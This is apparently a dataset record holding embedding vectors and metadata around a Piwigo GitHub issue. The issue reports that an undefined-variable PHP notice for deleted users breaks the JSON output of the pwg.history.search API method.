0.02912643551826477, -0.0093344422057271, 0.0007860827608965337, -0.0044329301454126835, -0.018549880012869835, -0.01021210290491581, 0.004261860623955727, 0.02414310723543167, 0.00622544065117836, 0.03379737585783005, -0.010896380990743637, -0.008568348363041878, -0.004001537803560495, -0.010435236617922783, 0.0198440570384264, 0.021614253520965576, 0.010732749477028847, 0.02173325978219509, -0.00144293368794024, 0.002491663908585906, 0.006757243536412716, 0.0016502623911947012, 0.01584251970052719, 0.00784688163548708, -0.01852012798190117, 0.0007354127010330558, -0.018817640841007233, -0.002309437608346343, -0.017553213983774185, 0.0054110013879835606, -0.0021290709264576435, 0.005953961052000523, 0.015723515301942825, -0.015351624228060246, -0.002080725273117423, -0.0038118737284094095, -0.01153603196144104, 0.0021086169872432947, -0.00037607387639582157, -0.0014150419738143682, 0.015470629557967186, -0.003094125771895051, 0.03097100928425789, 0.012525259517133236, 0.008092328906059265, -0.004566810559481382, 0.01750858686864376, -0.029185937717556953, 0.008984865620732307, 0.01892177015542984, 0.00719979265704751, 0.004299049731343985, 0.012012051418423653, 0.014592968858778477, 0.01651192083954811, 0.0074861482717096806, 0.015455753542482853, 0.0317147895693779, 0.003912284038960934, 0.010130287148058414, 0.007527056150138378, 0.017627591267228127, -0.013440108858048916, 0.015470629557967186, -0.003956911154091358, 0.004882917273789644, 0.0022796865087002516, 0.008605537936091423, -0.009200561791658401, 0.00236522126942873, 0.01140958908945322, 0.007207230664789677, -0.008813795633614063, -0.0013053343864157796, 0.019115151837468147, 0.005172991659492254, 0.006009744480252266, 0.02057296223938465, -0.007980762049555779, -0.004079634789377451, -0.0008618553401902318, 0.0008720823680050671, -0.008203895762562752, -0.012525259517133236, 0.006701460108160973, 0.003133174264803529, -0.008992303162813187, 0.0039383163675665855, -0.01079225167632103, -0.008650164119899273, -0.009126183576881886, 0.007452677935361862, -0.0019394069677218795, -0.015366500243544579, -0.022789426147937775, 0.029349569231271744, 0.021539876237511635, 0.009126183576881886, 0.000999454758130014, -0.010420361533761024, 0.026329820975661278, -0.008784044533967972, -0.006627081893384457, -0.02655295468866825, 0.006296099629253149, -0.006772119086235762, -0.006705178879201412, 0.024604251608252525, -0.003120158100500703, 0.013797123916447163, -0.019204406067728996, -0.0007995637715794146, -0.018654009327292442, -0.030911507084965706, -0.016392916440963745, 0.009371630847454071, 0.0022294812370091677, -0.0031610659789294004, -0.017493711784482002, -0.0008753364090807736, -0.005808923859149218, 0.006277505308389664, 0.014622719958424568, -0.006392791401594877, -0.0035701452288776636, -0.02771325223147869, 0.017820974811911583, -0.004551935009658337, 0.019144903868436813, -0.0034306864254176617, 0.015812767669558525, -0.021391119807958603, 0.01390125323086977, -0.004001537803560495, 0.010621181689202785, 0.005972555372864008, -0.03070324845612049, -0.0013834312558174133, 0.025690170004963875, 0.00340093532577157, -0.008062577806413174, -0.010583993047475815, -0.010576555505394936, -0.0029007429257035255, 0.0008339636260643601, 0.003878813935443759, 0.013298790901899338, 0.024381116032600403, -0.0038230305071920156, 0.01710694655776024, -0.0013741339789703488, -0.030643746256828308, -0.006716335657984018, -0.010941007174551487, -0.0018882721196860075, 0.022358033806085587, -0.009609640575945377, 0.007854319177567959, 0.006002306472510099, -0.00013318314449861646, 0.013596302829682827, 0.009721208363771439, 0.002461912576109171, -0.006244035437703133, -0.026195939630270004, -0.0047341613098979, -0.002203448908403516, 0.00363150704652071, 0.01692843809723854, -0.04424005001783371, 0.018296994268894196, -0.009899714961647987, -0.013960755430161953, -0.02906693145632744, -0.00035143617424182594, 0.002846818882972002, -0.016333414241671562, -0.010070784948766232, -0.009490636177361012, -0.018073860555887222, 0.007229544222354889, -0.0014578093541786075, 0.009832775220274925, 0.016407791525125504, -0.009431133978068829, 0.010145162232220173, -0.010903818532824516, -0.006363040301948786, -0.012555010616779327, -0.02473813109099865, 0.0019301098072901368, 0.009869963862001896, -0.0034827510826289654, 0.007958448491990566, -0.02796613797545433, -0.013150034472346306, -0.02731161005795002, 0.0013322964077815413, 0.01700281724333763, 0.0165862999856472, 0.012428567744791508, 0.001978455577045679, 0.0016921000787988305, -0.005649011116474867, 0.008947676047682762, -0.0031034231651574373, -0.004704410210251808, 0.011483967304229736, -0.030494989827275276, -0.006876248400658369, 0.017478836700320244, 0.0003047174832317978, -0.005094894673675299, 0.03576095402240753, -0.000974352122284472, -0.0059056151658296585, 0.02414310723543167, -0.01834162138402462, -0.01257732417434454, 0.019620923325419426, -0.007735314778983593, -0.009988969191908836, -0.018044108524918556, 0.009646830148994923, -0.018981272354722023, -0.02490176260471344, -0.011751728132367134, 0.029156185686588287, -0.004477557260543108, 0.008166707120835781, -0.021971268579363823, 0.0219266414642334, -0.0023800968192517757, 0.010747624561190605, -0.010182351805269718, -0.010606306605041027, -0.0055932276882231236, -0.02812976948916912, 0.004749036859720945, 0.012502945959568024, 0.0032242874149233103, -0.021867139264941216, 0.024098480120301247, -0.022610919550061226, -0.020439080893993378, -0.00904436782002449, 0.0009366982849314809, 0.012621951289474964, 0.0005062354612164199, 0.021465498954057693, -0.005645292345434427, -0.007750190328806639, 0.0002349880669498816, -0.005953961052000523, -0.004994484595954418, -0.011007947847247124, -0.01850525289773941, 0.010859191417694092, 0.010189789347350597, -0.023637335747480392, -0.013551676645874977, -0.012257498688995838, -0.030733000487089157, 0.003916002810001373, -0.019620923325419426, -0.0006312835030257702, -0.0008897471125237644, -0.0036147721111774445, 0.03323210030794144, -0.00606180913746357, -0.0022108869161456823, -0.00826339889317751, 0.006493201479315758, -0.004161450546234846, -0.005403563380241394, -0.014466525986790657, -0.015039236284792423, 0.014987172558903694, 0.007370862178504467, -0.008315463550388813, -0.009364193305373192, -0.007861757650971413, -0.01825236715376377, -0.01627391204237938, 0.001303474884480238, 0.004808539524674416, -0.013663243502378464, -0.013410357758402824, -0.03019747883081436, -0.010554241947829723, 0.011491404846310616, 0.011550907045602798, 0.0006605698144994676, -0.017954856157302856, 0.013856626115739346, -0.020647339522838593, -0.018639132380485535, -0.005243650637567043, 0.0038118737284094095, -0.00420979643240571, 0.006154781673103571, -0.024708380922675133, 0.011550907045602798, -0.01752346195280552, 0.009267501533031464, 0.034808915108442307, 0.011164141818881035, -0.009713769890367985, 0.02057296223938465, 0.020305201411247253, -0.011744290590286255, 0.01285996101796627, -0.011030261404812336, 0.009014616720378399, -0.013559114187955856, 0.012250061146914959, -0.0031090015545487404, 0.030673498287796974, 0.0010078222258016467, 0.004116823896765709, -0.00900717917829752, 0.00020419091742951423, -0.017449084669351578, 0.00905180536210537, 0.006076684687286615, -0.007144009228795767, 0.024872012436389923, -0.015180555172264576, 0.00800307560712099, 0.0006205916288308799, -0.00041791153489612043, -0.017731720581650734, 0.01199717540293932, 0.0017636889824643731, -0.00547422282397747, 0.006586174014955759, -0.011364961974322796, 0.00826339889317751, 0.01523261982947588, -0.0010068925330415368, 0.028070267289876938, -0.013990506529808044, -0.000979930511675775, 0.005574632901698351, -0.005128365010023117, 0.0109633207321167, 0.017701970413327217, -0.001891061314381659, -0.007698125671595335, 0.0067758383229374886, -0.000549932534340769, -0.032399069517850876, -0.003916002810001373, -0.0076683745719492435, -0.017910229042172432, -0.005849831737577915, -0.008493970148265362, 0.019769679754972458, -0.004771350417286158, -0.009736083447933197, -0.011037698946893215, -0.034481652081012726, 0.014213640242815018, 0.014585530385375023, -0.018743261694908142, 0.006853934843093157, -0.010093098506331444, 0.010888942517340183, 0.014273143373429775, -0.015128490515053272, -0.018698636442422867, -0.03528493642807007, 0.015321873128414154, -0.02151012420654297, -0.024946389719843864, -0.00858322437852621, -0.008345214650034904, -0.007255576550960541, -0.014600406400859356, 0.01099307183176279, -0.010517052374780178, 0.007601434364914894, -0.01835649646818638, 0.004280455410480499, 0.018787888810038567, -0.01716644875705242, 0.00570851331576705, 0.011729414574801922, -0.019115151837468147, 0.017211075872182846, -0.0039197220467031, -0.0012579183094203472, 0.00991459097713232, -0.0035775830037891865, -0.002370799658820033, -0.004295330960303545, -0.005492817144840956, 0.005927928723394871, -0.00033051735954359174, -0.007951010949909687, -0.010517052374780178, 0.011335210874676704, -0.00900717917829752, -0.01257732417434454, -0.000015471210645046085, 0.007214668672531843, -0.004321363288909197, -0.009803024120628834, 0.02067709155380726, 0.003389778546988964, 0.028933051973581314, -0.00891792494803667, 0.012621951289474964, -0.021629130467772484, -0.015470629557967186, 0.0025846364442259073, -0.005782891530543566, 0.003244741354137659, -0.01759784109890461, 0.000278220308246091, -0.013380606658756733, 0.004243266303092241, -0.0024953826796263456, -0.001574954716488719, -0.008657602593302727, 0.006682865787297487, 0.010457550175487995, 0.030182601884007454, -0.0031796605326235294, -0.00917081069201231, -0.0033804811537265778, -0.011721977032721043, 0.007519618142396212, -0.0007247208850458264, -0.004258141852915287, -0.0079733245074749, -0.0027910354547202587, 0.010055908933281898, -0.0024321614764630795, -0.003081109607592225, 0.021792761981487274, -0.00975839700549841, 0.002586495829746127, 0.0020323796197772026, -0.006667989771813154, -0.0003897873393725604, -0.0013146315468475223, -0.022134900093078613, 0.013283914886415005, -0.017374707385897636, 0.01968042552471161, -0.011952548287808895, 0.006853934843093157, 0.009698894806206226, 0.015530131757259369, -0.026493452489376068, 0.012004612945020199, -0.007173760328441858, 0.002941650804132223, -0.005106051452457905, 0.00012702372623607516, -0.026210816577076912, 0.016809433698654175, 0.00020930441678501666, 0.026835592463612556, 0.007638623006641865, 0.0013081234646961093, -0.0032726330682635307, 0.010279042646288872, -0.004752755630761385, -0.005009360145777464, -0.0006019971333444118, -0.0019282503053545952, 0.01792510412633419, -0.009951779618859291, 0.01719619892537594, 0.00039257650496438146, -0.0009432063088752329, -0.0011937672970816493, 0.0045779673382639885, 0.034660160541534424, -0.02084072306752205, -0.012257498688995838, 0.0005861918325535953, -0.028605788946151733, 0.009200561791658401, 0.022268781438469887, -0.006199408322572708, -0.017493711784482002, 0.012056677602231503, 0.012361628003418446, -0.012956651858985424, 0.0016298084519803524, -0.010985634289681911, -0.01808873564004898, -0.0017320782644674182, 0.007541931699961424, 0.01710694655776024, -0.006842778529971838, 0.012934338301420212, -0.011647598817944527, -0.01157322060316801, -0.013559114187955856, 0.014897918328642845, -0.013826875016093254, -0.0015805329894647002, -0.009371630847454071, 0.004057321231812239, -0.015976399183273315, 0.012532697059214115, -0.005239931866526604, 0.009483198635280132, 0.010546804405748844, -0.0097881481051445, 0.00022208812879398465, -0.013112845830619335, 0.003568285843357444, 0.021197738125920296, -0.009074118919670582, 0.007605153135955334, -0.007110539358109236, 0.01910027675330639, -0.020706841722130775, -0.01125339511781931, 0.0010041033383458853, -0.00547422282397747, 0.029081808403134346, 0.006496920716017485, 0.017493711784482002, -0.02116798609495163, 0.006645676679909229, 0.0029955750796943903, -0.004745318088680506, 0.0012290969025343657, -0.01166247483342886, 0.008389840833842754, -0.00036654420546256006, -0.006091560237109661, -0.018787888810038567, 0.01079225167632103, 0.023711714893579483, -0.03272633254528046, 0.027787629514932632, 0.009817899204790592, 0.010888942517340183, 0.009304691106081009, 0.008122080005705357, 0.00270921946503222, -0.004098229110240936, -0.008203895762562752, -0.00024707449483685195, -0.004812258295714855, 0.01701769232749939, 0.008040264248847961, 0.002409847918897867, 0.015827644616365433, -0.016080528497695923, 0.002238778630271554, -0.02057296223938465, 0.005701075773686171, -0.0069097187370061874, -0.010107973590493202, -0.008040264248847961, -0.02356295846402645, 0.001943125855177641, 0.016958190128207207, -0.013239288702607155, 0.010866629891097546, -0.012168245390057564, 0.005228775087743998, 0.018698636442422867, -0.012197996489703655, 0.006363040301948786, 0.015128490515053272, -0.008434467948973179, 0.006723773665726185, 0.007229544222354889, -0.001347171957604587, -0.004752755630761385, -0.015135928057134151, -0.008412154391407967, 0.0060134632512927055, 0.023756342008709908, 0.013759934343397617, 0.012651702389121056, -0.010472426190972328, -0.023116691038012505, -0.005444471258670092, -0.008523721247911453, 0.0019301098072901368, 0.02124236337840557, 0.001095216372050345, 0.0033544490579515696, 0.0333511084318161, -0.0011547188041731715, -0.01448883954435587, 0.027594247832894325, 0.00322614680044353, -0.01004103384912014, -0.00719979265704751, -0.02622569166123867, 0.0094683226197958, 0.0177614726126194, -0.00028705268050543964, 0.028650416061282158, 0.00726301409304142, -0.002062130719423294, 0.019055649638175964, -0.015202868729829788, 0.0064857639372348785, 0.025749672204256058, -0.0010301356669515371, 0.007203511893749237, 0.007995638065040112, -0.006299818865954876, -0.005109770223498344, 0.0032112712506204844, -0.013053343631327152, 0.006984096486121416, -0.008650164119899273, -0.015783017501235008, 0.007184917107224464, -0.0017051162431016564, -0.006645676679909229, 0.02390509657561779, -0.02432161383330822, -0.023310072720050812, 0.0012858101399615407, 0.016705304384231567, 0.029245439916849136, 0.006322131957858801, 0.002523274626582861, 0.025526538491249084, 0.0009515738347545266, 0.034065134823322296, -0.0012802317505702376, 0.0025325717870146036, -0.028427280485630035, -0.007787379436194897, -0.0004918246995657682, -0.026329820975661278, 0.01111951470375061, 0.004864322952926159, -0.003605474717915058, -0.0025771986693143845, 0.00975839700549841, 0.0019059368642047048, 0.01716644875705242, -0.025779424235224724, 0.0018640992930158973, 0.015530131757259369, -0.007043599151074886, -0.002567901276051998, -0.01348473597317934, -0.0007684179581701756, -0.011952548287808895, -0.03028673119843006, 0.01053936593234539, -0.01227981224656105, -0.02390509657561779, -0.007155166007578373, -0.016333414241671562, -0.01667555421590805, 0.007653499022126198, 0.0018269103020429611, 0.012398816645145416, -0.008285712450742722, 0.0038416250608861446, 0.008806358091533184, 0.005202742759138346, 0.0024061291478574276, -0.018475500866770744, -0.012822771444916725, -0.004845728166401386, -0.004183764103800058, -0.013871502131223679, -0.016809433698654175, -0.0035534100607037544, 0.014711973257362843, -0.02656782977283001, 0.007121696136891842, 0.000262414978351444, -0.0160359013825655, -0.020900225266814232, -0.010680684819817543, -0.007188636343926191, 0.012696328572928905, -0.014756600372493267, 0.002718516858294606, -0.00887329876422882, -0.00014643173199146986, 0.0028133487794548273, 0.028412405401468277, 0.026671959087252617, -0.008508846163749695, 0.006608487572520971, 0.02524390257894993, -0.01436239667236805, -0.0009771413169801235, 0.0022239028476178646, 0.012688891030848026, -0.0018761856481432915, -0.006281224079430103, 0.008122080005705357, 0.013990506529808044, 0.014868167228996754, -0.001366696204058826, 0.00016177220095414668, -0.007660936564207077, -0.01642266847193241, 0.007817130535840988, 0.008040264248847961, -0.010680684819817543, 0.026002557948231697, -0.026106687262654305, -0.0013406638754531741, 0.017731720581650734, 0.026032308116555214, 0.0036203505005687475, 0.006976658944040537, 0.00871710479259491, 0.020320076495409012, -0.0004100088553968817, 0.014860729686915874, 0.003787701018154621, -0.0021141953766345978, -0.03030160814523697, -0.009103870019316673, 0.014875604771077633, -0.011959986761212349, 0.0034901888575404882, -0.00812951847910881, 0.006853934843093157, -0.01792510412633419, -0.005782891530543566, -0.023339824751019478, 0.016080528497695923, 0.022179527208209038, 0.00495729548856616, -0.002465631579980254, -0.010115411132574081, -0.007151447236537933, 0.006210565101355314, -0.003560848068445921, -0.013112845830619335, 0.0023503454867750406, -0.011179016903042793, -0.017062319442629814, -0.00755308847874403, 0.004499870352447033, 0.002474928740411997, 0.00017955320072360337, -0.004544497467577457, -0.019368037581443787, -0.02058783732354641, 0.002182994969189167, 0.0011361243668943644, 0.0123244384303689, 0.012488070875406265, 0.008218771778047085, 0.010747624561190605, -0.027266984805464745, 0.002727814018726349, 0.005076300352811813, 0.0019263908034190536, -0.0033693246077746153, -0.016080528497695923, -0.009416257962584496, 0.022521665319800377, 0.0023112972266972065, -0.007281608879566193, -0.035076677799224854, -0.009141059592366219, 0.013083094730973244, 0.014972296543419361, 0.00900717917829752, -0.0059056151658296585, 0.003503205021843314, 0.013841750100255013, 0.023057186976075172, -0.0056899189949035645, 0.00962451659142971, 0.0024154263082891703, 0.008278273977339268, 0.0027352517936378717, -0.010970759205520153, -0.0035069237928837538, -0.0009631954017095268, 0.0005155326798558235, 0.02897767908871174, -0.003990381024777889, -0.00047020858619362116, 0.0031647849828004837, 0.001840856159105897, -0.002631122712045908, 0.02100435458123684, 0.010226978920400143, -0.007832005620002747, 0.010710435919463634, -0.01070299744606018, 0.006262629758566618, -0.0013825015630573034, 0.0006740508833900094, -0.011268271133303642, 0.02232828363776207, -0.006441136822104454, -0.004079634789377451, 0.0006963642663322389, 0.014749162830412388, -0.004704410210251808, -0.020781220868229866, -0.018773013725876808, -0.004418054595589638, 0.011952548287808895, -0.019293660297989845, -0.003624069271609187, 0.021063856780529022, 0.03242881968617439, 0.01661605015397072, -0.013469859957695007, 0.010881504975259304, -0.015916896983981133, -0.000778180081397295, -0.021480374038219452, -0.013507049530744553, 0.004172607325017452, -0.0029435104224830866, 0.009579889476299286, 0.00015514790720771998, 0.0036835717037320137, -0.0006131538539193571, 0.0010794111294671893, 0.01841599866747856, -0.00006066457717679441, 0.011454216204583645, 0.012235185131430626, -0.0011045136488974094, 0.014592968858778477, 0.004165169317275286, 0.0016577002825215459, -0.004708128981292248, -0.0007098452770151198, 0.009453446604311466, 0.024470370262861252, -0.0036910094786435366, 0.003004872240126133, 0.02937931939959526, -0.022268781438469887, -0.003220568411052227, 0.014273143373429775, -0.02173325978219509, -0.014459088444709778, -0.0047973827458918095, 0.023845594376325607, -0.004246985074132681, 0.02522902563214302, 0.0017664780607447028, -0.0014457228826358914, 0.024262111634016037, 0.0026590144261717796, 0.023473704233765602, -0.003466015914455056, 0.024678628891706467, -0.028620664030313492, 0.002839381108060479, 0.0042283907532691956, -0.0008558121626265347, -0.0018622397910803556, -0.007140290457755327, -0.01669042930006981, -0.013120283372700214, -0.0033414328936487436, 0.03177429363131523, -0.0028561162762343884, -0.002296421444043517, -0.016883810982108116, -0.027281859889626503, 0.01468965969979763, -0.030643746256828308, 0.016749931499361992, 0.004890355281531811, 0.016749931499361992, 0.006474607158452272, 0.0255562886595726, 0.0008218771545216441, 0.018237492069602013, 0.004135418217629194, -0.00031424715416505933, 0.0026962035335600376, 0.0051581161096692085, -0.010301356203854084, 0.0013202099362388253, 0.0011463513365015388, -0.005663886666297913, -0.005660167895257473, -0.004332520067691803, 0.005377531051635742, -0.0002991391229443252, -0.002201589522883296, -0.025169523432850838, -0.024767883121967316, -0.006418823730200529, 0.005068862345069647, 0.01065837126225233, -0.010903818532824516, -0.035820458084344864, -0.014183889143168926, -0.013581427745521069, -0.019189530983567238, -0.011669912375509739, -0.004217233974486589, 0.01331366691738367, -0.023443954065442085, -0.01036829687654972, 0.001246761647053063, -0.0031666443683207035, -0.021777885034680367, -0.016154907643795013, -0.004198639653623104, -0.0024079885333776474, 0.012502945959568024, 0.00826339889317751, -0.0059428042732179165, -0.006548984907567501, -0.011015385389328003, 0.020052315667271614, 0.006024620030075312, -0.001169594470411539, -0.002104898216202855, 0.004856884945183992, 0.007913822308182716, 0.010531928390264511, 0.0044701192528009415, 0.028367778286337852, -0.003605474717915058, -0.00024823666899465024, -0.022432412952184677, -0.016214409843087196, 0.003904846264049411, -0.00876173097640276, 0.009393944405019283, -0.004607718903571367, 0.014102073386311531, -0.012041802518069744, 0.026106687262654305, 0.004522183910012245, -0.017880477011203766, 0.0053626555018126965, 0.008040264248847961, -0.006656833458691835, -0.011893046088516712, 0.0051209270022809505, -0.001189118716865778, -0.01349217351526022, 0.010093098506331444, 0.006965502165257931, 0.0035720046143978834, 0.0016102842055261135, -0.0219266414642334, 0.003120158100500703, 0.0018315588822588325, 0.008196458220481873, 0.00036910094786435366, -0.014875604771077633, -0.03070324845612049, -0.02524390257894993, 0.010941007174551487, 0.009230312891304493, -0.016407791525125504, -0.009193124249577522, 0.01758296601474285, 0.000986438593827188, 0.011491404846310616, 0.01245088130235672, 0.01602102629840374, -0.002296421444043517, -0.017657343298196793, 0.006671709008514881, -0.034987423568964005, 0.006898561958223581, 0.0236522126942873, -0.0023763778153806925, -0.003259616903960705, -0.007300203200429678, -0.004429211374372244, -0.007155166007578373, 0.002776159904897213, -0.018192864954471588, 0.018654009327292442, -0.027014099061489105, 0.00024498262791894376, -0.02564554288983345, 0.00012516426795627922, 0.0015154522843658924, 0.028531409800052643, 0.010018720291554928, 0.005808923859149218, -0.009393944405019283, 0.004473838023841381, 0.0018250508001074195, -0.002182994969189167, -0.019487041980028152, 0.009869963862001896, -0.01050217729061842, 0.03695100173354149, -0.012004612945020199, 0.05295715481042862, 0.0015861113788560033, -0.006664271000772715, 0.02200102061033249, -0.011632722802460194, -0.014206202700734138, 0.017211075872182846, -0.023057186976075172, -0.028204146772623062, -0.007367143407464027, -0.009542700834572315, 0.00975839700549841, 0.014726849272847176, -0.011588096618652344, 0.008486532606184483, -0.0009134551510214806, -0.0005411001620814204, 0.0031740821432322264, -0.003386059543117881, 0.0010980055667459965, -0.01216080691665411, -0.0157681405544281, 0.011945110745728016, -0.010926132090389729, 0.011030261404812336, 0.011007947847247124, -0.0006229159771464765, -0.006020901259034872, 0.019189530983567238, -0.023860471323132515, 0.009111308492720127, 0.012711204588413239, -0.000803282659035176, 0.010427799075841904, 0.0070510366931557655, 0.011945110745728016, -0.014682222157716751, 0.01677968166768551, -0.005786610301584005, -0.019710177555680275, 0.02008206769824028, 0.006169657222926617, 0.00322614680044353, 0.003968067467212677, 0.015440878458321095, -0.00002810966361721512, 0.005790329072624445, -0.011089763604104519, -0.01062862016260624, -0.03927159681916237, -0.023310072720050812, 0.00525108864530921, -0.00031331743230111897, 0.005820080637931824, 0.014920231886208057, -0.012131055817008018, 0.0011045136488974094, -0.01801435835659504, -0.009319566190242767, -0.014265704900026321, 0.005749421194195747, -0.018624257296323776, 0.002841240493580699, 0.014674784615635872, -0.004306487739086151, 0.013045906089246273, 0.021718382835388184, 0.016140030696988106, -0.013350855559110641, 0.024202609434723854, 0.0015173116698861122, -0.011223644018173218, -0.004711847752332687, 0.022298531606793404, -0.015708638355135918, -0.007928697392344475, 0.018743261694908142, -0.004786225967109203, -0.015723515301942825, -0.009438571520149708, -0.00398666225373745, -0.01348473597317934, -0.00047299775178544223, -0.003971786703914404, 0.01422851625829935, -0.0088807363063097, -0.002580917440354824, -0.003012310015037656, -0.014756600372493267, 0.009877401404082775, 0.005269682966172695, 0.03528493642807007, -0.02307206392288208, -0.0017218512948602438, -0.011610410176217556, -0.0076311854645609856, -0.009579889476299286, 0.02615131437778473, -0.000816298823338002, 0.005898177623748779, -0.016318539157509804, 0.022610919550061226, -0.00041674936073832214, -0.015634261071681976, -0.003499486017972231, -0.006753524765372276, -0.012175682932138443, -0.007623747456818819, -0.00622172188013792, -0.007646061014384031, -0.005820080637931824, 0.014630157500505447, -0.02033495157957077, 0.024113355204463005, 0.0031963957007974386, 0.009810461662709713, 0.017077194526791573, 0.0011110217310488224, 0.003233584575355053, 0.0077278767712414265, -0.016318539157509804, -0.012257498688995838, 0.005715951323509216, -0.00784688163548708, -0.0044106170535087585, -0.03222056105732918, 0.0015833221841603518, 0.005552319809794426, 0.008255960419774055, -0.0070510366931557655, -0.005890739616006613, -0.018386248499155045, 0.007943573407828808, 0.016660677269101143, 0.009565014392137527, 0.022134900093078613, 0.0022927026730030775, 0.015247494913637638, -0.005983712151646614, 0.0012179401237517595, -0.02615131437778473, 0.036326225847005844, -0.004061040002852678, 0.0079733245074749, 0.010688122361898422, -0.0021495248656719923, -0.019234158098697662, -0.0036147721111774445, -0.0076311854645609856, -0.011104639619588852, 0.011193892918527126, -0.014421898871660233, 0.020364703610539436, 0.012517821975052357, -0.0016986081609502435, -0.007460115943104029, 0.00616221921518445, 0.007192355114966631, -0.027014099061489105, 0.002101179212331772, 0.00599858770146966, -0.006757243536412716, -0.014920231886208057, 0.0219266414642334, 0.010844316333532333, 0.010926132090389729, 0.002757565351203084, 0.003971786703914404, 0.011885608546435833, -0.001620511175133288, 0.0034251080360263586, 0.006813026964664459, 0.013142596930265427, -0.010732749477028847, 0.02091510035097599, 0.00013748313358519226, 0.0014708254020661116, 0.0019710175693035126, -0.0015526412753388286, 0.01332110445946455, 0.004016413353383541, 0.00225179479457438, -0.01968042552471161, -0.0050837378948926926, 0.012547573074698448, -0.011736852116882801, -0.015426002442836761, -0.001347171957604587, 0.01850525289773941, -0.0065080770291388035, 0.01584251970052719, -0.02124236337840557, 0.009364193305373192, -0.021048981696367264, -0.008694791235029697, 0.027103353291749954, 0.013172348029911518, -0.007713001221418381, 0.01634828932583332, -0.025586040690541267, -0.0005638783914037049, -0.015574758872389793, 0.004537059459835291, 0.00518414843827486 ]
null
null
null
null
null
null
null
null
null
[ "Piwigo", "Piwigo" ]
Each time we have a missing user (because it was deleted), we get a: > Notice: Undefined variable: user_name in include/ws_functions/pwg.php on line 1000 This makes the JSON output of method `pwg.history.search` unparsable for page [Administration > Tools > History > tab Search].
[pwg.history.search] notice on missing users
https://api.github.com/repos/Piwigo/Piwigo/issues/2050/comments
0
2023-11-27T15:01:18
2023-11-27T15:02:10Z
https://github.com/Piwigo/Piwigo/issues/2050
2,012,470,374
2,050
false
This is a GitHub Issue repo:Piwigo owner:Piwigo Title : [pwg.history.search] notice on missing users Issue date: --- start body --- Each time we have a missing user (because it was deleted), we get a: > Notice: Undefined variable: user_name in include/ws_functions/pwg.php on line 1000 This makes the JSON output of method `pwg.history.search` unparsable for page [Administration > Tools > History > tab Search]. --- end body ---
438
[ -0.031021349132061005, 0.0003621435025706887, -0.006761150900274515, 0.005237414967268705, 0.021332301199436188, 0.00910141784697771, 0.01589331589639187, 0.04315657168626785, -0.020403027534484863, -0.02883482165634632, -0.020867664366960526, -0.0006738943629898131, -0.015865985304117203, -0.016289623454213142, -0.0008203745819628239, 0.034492459148168564, -0.03684297576546669, 0.0209086611866951, 0.0016697889659553766, 0.003348119091242552, -0.032579246908426285, -0.026169991120696068, 0.0027451158966869116, 0.01454040315002203, 0.00205328525044024, 0.01814817264676094, 0.004865021910518408, 0.007755337283015251, -0.009552388451993465, -0.008137979544699192, -0.00042598837171681225, 0.002881773980334401, -0.007126710843294859, -0.02144162729382515, 0.037881575524806976, -0.03941214457154274, 0.03028339520096779, 0.03175929933786392, -0.012442703358829021, 0.01474539004266262, -0.0017868023132905364, -0.023436833173036575, -0.02496740221977234, 0.008534287102520466, -0.008322467096149921, -0.018708469346165657, 0.0038435040041804314, 0.0012581070186570287, -0.024147454649209976, 0.020321032032370567, 0.027509240433573723, -0.005442401859909296, -0.00089596351608634, -0.005473149940371513, -0.015428679063916206, -0.0552917942404747, 0.021291304379701614, -0.028506843373179436, -0.034902434796094894, -0.00811748020350933, -0.02172860875725746, -0.0006294805789366364, 0.01862647384405136, 0.03503908962011337, 0.002420553471893072, 0.025336379185318947, -0.015524339862167835, 0.03268857300281525, -0.01423975545912981, 0.014827384613454342, 0.035203080624341965, 0.055510446429252625, 0.04793959856033325, 0.006422922480851412, 0.006412672810256481, -0.024092791602015495, 0.049470167607069016, 0.019911060109734535, -0.018913457170128822, -0.004068989772349596, -0.01784752495586872, -0.0168362557888031, -0.006730402819812298, -0.0018192585557699203, 0.002010579686611891, -0.047447629272937775, 0.0025879594031721354, -0.07160875201225281, 0.019200438633561134, -0.008486457169055939, -0.005907038692384958, 0.019241435453295708, 0.004017742816358805, -0.03028339520096779, 0.0036897638346999884, 0.006132524460554123, -0.007741671055555344, 0.02125030755996704, 0.019965723156929016, 0.010918968357145786, -0.005049510393291712, -0.018134506419301033, -0.014376413077116013, 0.004010910168290138, 0.033645179122686386, 0.02610166370868683, 0.020990656688809395, -0.027071934193372726, 0.012948337942361832, 0.10386002063751221, 0.05447184666991234, 0.024694086983799934, -0.05190267786383629, -0.009128749370574951, 0.026607297360897064, 0.042117971926927567, 0.011916570365428925, 0.02424311451613903, -0.022534891963005066, 0.03274323791265488, -0.001766303670592606, -0.04567107558250427, -0.003816172480583191, 0.02424311451613903, -0.004660035017877817, 0.029600106179714203, 0.003522357903420925, 0.005001679994165897, -0.007270201575011015, 0.0030560127925127745, -0.000696528353728354, -0.025869345292448997, 0.0076938411220908165, 0.017123237252235413, -0.054307859390974045, -0.004144151695072651, 0.008165311068296432, 0.0014050143072381616, 0.01009218767285347, -0.005271579138934612, -0.06767300516366959, -0.04651835560798645, 0.0035565223079174757, -0.018175503239035606, -0.035312406718730927, 0.02172860875725746, -0.002220691181719303, -0.07275667786598206, 0.01695924811065197, 0.037170954048633575, -0.010556824505329132, -0.04791226610541344, 0.02298586256802082, -0.012599860318005085, 0.030365390703082085, 0.009265406988561153, -0.0018892957596108317, 0.00910825002938509, -0.03044738434255123, 0.005025594960898161, -0.017123237252235413, -0.031731970608234406, 0.032934557646512985, -0.015469676814973354, -0.040997374802827835, -0.053952548652887344, 0.03708896040916443, 0.011301609687507153, 0.017273562029004097, 0.011356273666024208, -0.01660393737256527, -0.039384812116622925, 0.01388444472104311, 0.0006666344124823809, -0.012053228914737701, 0.01471805851906538, -0.017943184822797775, 0.0026050417218357325, -0.050672758370637894, -0.002507672877982259, -0.02919013239443302, -0.018134506419301033, -0.018435154110193253, -0.03643300011754036, 0.03648766502737999, -0.038838181644678116, 0.006170105189085007, 0.03572238236665726, 0.011896071955561638, -0.014431076124310493, -0.011417768895626068, -0.02526804991066456, -0.0013059373013675213, -0.03572238236665726, -0.006863643880933523, 0.01436274778097868, -0.023969799280166626, -0.04088804870843887, 0.023081522434949875, -0.03277057036757469, 0.04485113173723221, -0.055565111339092255, -0.011574925854802132, -0.014376413077116013, -0.036105021834373474, 0.04066939651966095, -0.005042677279561758, 0.028260858729481697, -0.05116472765803337, 0.0014605314936488867, -0.02012971229851246, -0.023573491722345352, 0.012907341122627258, 0.005452651064842939, -0.025719020515680313, 0.022767210379242897, 0.040095433592796326, -0.0171915665268898, 0.022111251950263977, 0.003035514149814844, -0.010461163707077503, -0.03498442843556404, -0.006877310108393431, 